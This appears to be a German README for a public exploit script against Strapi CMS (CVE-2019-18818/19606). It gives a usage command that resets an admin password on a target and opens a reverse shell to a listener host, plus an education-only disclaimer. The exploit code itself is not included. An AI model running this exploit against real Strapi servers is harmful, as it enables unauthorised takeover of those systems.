
CVE-2019-18818/19606 Strapi RCE
Blinde Remote-Code-Ausführung von Strapi CMS Version 3.0.0-beta.17.7 und früher, um eine Reverse Shell zu erhalten
python3 strapi_exp.py -t http://strapi.hack/ -e [email protected] -p new_password -lhost 127.0.0.1 -lport 9001
Hilfe-Prompt
python3 strapi_exp.py -h
Der gesamte auf diesem Repository bereitgestellte Code dient ausschließlich zu Bildungs- und Forschungszwecken. Alle Handlungen und/oder Aktivitäten im Zusammenhang mit dem in diesem Repository enthaltenen Material liegen in Ihrer alleinigen Verantwortung. Der Missbrauch des Codes in diesem Repository kann zu strafrechtlichen Anklagen gegen die betreffenden Personen führen. Der Autor übernimmt keine Verantwortung für den Fall, dass strafrechtliche Anklagen gegen Personen erhoben werden, die den Code in diesem Repository missbrauchen, um gegen das Gesetz zu verstoßen.